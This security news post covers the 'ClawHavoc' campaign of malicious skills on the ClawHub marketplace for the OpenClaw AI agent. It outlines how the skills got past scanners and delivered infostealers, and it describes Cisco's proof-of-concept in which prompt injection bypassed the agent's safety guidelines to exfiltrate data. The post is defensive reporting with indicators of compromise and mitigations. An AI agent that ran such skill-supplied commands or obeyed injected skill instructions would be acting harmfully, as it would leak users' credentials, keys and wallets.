A security audit of OpenClaw’s ClawHub marketplace has uncovered 341 malicious skills designed to steal cryptocurrency wallets, passwords, and API keys from anyone who installed them. One threat actor published 335 of those skills in a single coordinated campaign.
The AI agent ecosystem just got its first real supply chain attack. And the platform’s response? A reporting button.
What Happened
Researchers at Koi Security audited 2,857 skills on ClawHub - OpenClaw’s third-party plugin marketplace - and found 341 that were actively malicious. They dubbed the campaign ClawHavoc.
The attack unfolded in two waves between late January and early February 2026:
- January 27-29: An initial batch of 28 malicious skills appeared, targeting both OpenClaw and Moltbot users
- January 31-February 2: A much larger wave of 386 skills hit ClawHub and GitHub
Independent researcher Paul McCarty (alias 6mile) confirmed the findings: “All these skills share the same command-and-control infrastructure and use sophisticated social engineering to convince users to execute malicious commands.”
Most of the malicious skills masqueraded as cryptocurrency trading bots, price trackers, and productivity tools - the kind of things power users install without a second thought.
How the Attack Works
The infection chain is straightforward and brutally effective.
On Windows, a skill’s instructions tell users to download a password-protected ZIP file from an external GitHub repository. The password (“openclaw”) exists solely to bypass automated security scanners. Inside: a Trojanized executable called openclaw-agent.exe that functions as an infostealer.
On macOS, skills reference obfuscated shell commands hosted on Glot.io, a code-sharing pastebin. The commands decode to a single curl call that downloads and executes a payload from IP address 91.92.242.30. The final payload is Atomic Stealer (AMOS), a commodity malware-as-a-service tool that rents for $500-1,000 per month.
Both vectors harvest:
- Cryptocurrency wallet private keys and exchange API keys
- Browser credentials and keychain passwords
- SSH keys and configuration files
- Bot authentication tokens for agent platforms
Some skills went further, embedding reverse shell backdoors for persistent interactive access to victims’ machines.
The Bigger Problem: AI Agents Run Your Commands
What makes this worse than a typical malicious npm package is what OpenClaw skills can do. These aren’t passive libraries sitting in your node_modules. OpenClaw skills execute shell commands, read and write files, and access your network - all with whatever permissions you gave the agent.
Cisco’s security team tested this attack surface with a proof-of-concept malicious skill called “What Would Elon Do?” Their findings:
- The skill executed
curlcommands that silently exfiltrated data to an external server - Prompt injection bypassed OpenClaw’s internal safety guidelines
- The malicious skill ranked #1 in the repository through artificial promotion
Their broader audit found that 26% of analyzed agent skills contained at least one vulnerability. One in four.
Cisco’s conclusion: “AI agents with system access can become covert data-leak channels that bypass traditional data loss prevention, proxies, and endpoint monitoring.”
ClawHub’s Response Was Inadequate
When researchers reported the malicious skills, OpenClaw creator Peter Steinberger added a reporting feature. Skills with more than 3 reports are now auto-hidden.
That’s it.
The underlying problem - that ClawHub is open by default and anyone with a week-old GitHub account can publish skills - remains unchanged.
And the attackers noticed. According to Snyk, the original malicious skill named “clawhub” received 7,743 downloads before it was removed on February 3. The threat actor immediately redeployed with a renamed variant, “clawdhub1,” which accumulated nearly 100 installations before being caught.
ClawHub’s maintainer reportedly admitted the registry cannot be properly secured. Most of the malicious skills remain online.
This Was Entirely Predictable
This is the same pattern we’ve seen with npm, PyPI, and every other open package registry. Threat actors publish typosquatted or enticing packages that execute malicious code on install. The playbook is identical - only the target has changed from developers’ build environments to AI agents with full system access.
The difference: when a malicious npm package runs postinstall, it executes in a sandboxed build context with limited permissions. When a malicious OpenClaw skill runs, it inherits the agent’s permissions - which typically include reading your files, executing arbitrary commands, and accessing your API keys.
As Snyk’s analysis put it: compromised agents can potentially access GitHub repositories and cloud infrastructure well beyond the local machine.
What You Can Do
If you use OpenClaw or any AI agent platform with a skill marketplace:
- Audit your installed skills now - check for anything from the “hightower6eu” or “zaycv” ClawHub accounts, or the “Ddoy233” GitHub account
- Run agents in isolated environments - containers, VMs, or at minimum a dedicated user account with restricted permissions
- Never execute setup commands blindly - if a skill tells you to download and run an external binary, that’s a red flag
- Monitor outbound network traffic - look for connections to
91.92.242.30or unexpected data exfiltration - Rotate credentials - if you installed any crypto-related skills recently, rotate your exchange API keys and check wallet activity immediately
- Use VirusTotal’s skill scanner - they’ve added OpenClaw skill analysis powered by Gemini 3 Flash to detect malicious behavior
For organizations, Cisco released an open-source skill scanner that combines static analysis, behavioral analysis, and LLM-assisted semantic analysis to evaluate skills before deployment.
The Bottom Line
The AI agent gold rush has outpaced the security infrastructure needed to support it. ClawHub’s “publish anything, we’ll add a report button later” approach is npm circa 2015 - except the attack surface is orders of magnitude larger because agents run with system-level access.
341 malicious skills is just the beginning. The incentive structure - trusted marketplace, powerful execution permissions, minimal vetting - guarantees more campaigns will follow. The question is whether the ecosystem will build real security controls before the next wave hits, or whether it’ll take a truly catastrophic breach to force the issue.
Given what we’ve seen so far, don’t hold your breath.